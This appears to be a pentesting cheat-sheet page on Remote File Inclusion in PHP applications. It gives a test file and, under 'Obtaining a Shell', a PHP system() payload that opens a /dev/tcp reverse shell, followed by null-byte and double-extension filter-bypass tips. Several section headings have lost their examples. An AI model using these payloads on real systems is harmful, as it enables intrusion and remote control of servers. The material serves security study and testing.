Remote File Inclusion (RFI)

Remote file inclusion (RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. The main difference when compared to LFI, is that RFI allows for an external URL to be injected, meaning that an attacker can include a malicious file, such as a PHP shell on their attack host.


Testing for RFI

Quick test for RFI with a PHP file, name this test.php and host using a Python server:

echo "Hello";

If we see the tags then we do not have remote code execution, however, if it says "Hello" then we have code execution.

Basic Exploitation


If RFI doesn't work due to the HTTP wrapper being disabled then we can also try the following wrappers:

Obtaining a Shell

The simplest way to obtain a shell is to make a callback to the attacker server:

Alternatively, the following commands can be input to a .txt file to obtain code execution:

<?php echo shell_exec("whoami");?>
<?php echo system("0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196"); ?>


  • As stated briefly in the LFI section, it is important in some situations to add a nullbyte %00 to avoid appending .php or another extension like .config. If this does not work you can also add a ?, to ensure that the rest will be interpreted as URL parameters.

    • A pretty dirty way of bypassing this is also to name your file with the extension, e.g., evil.txt.php


Last updated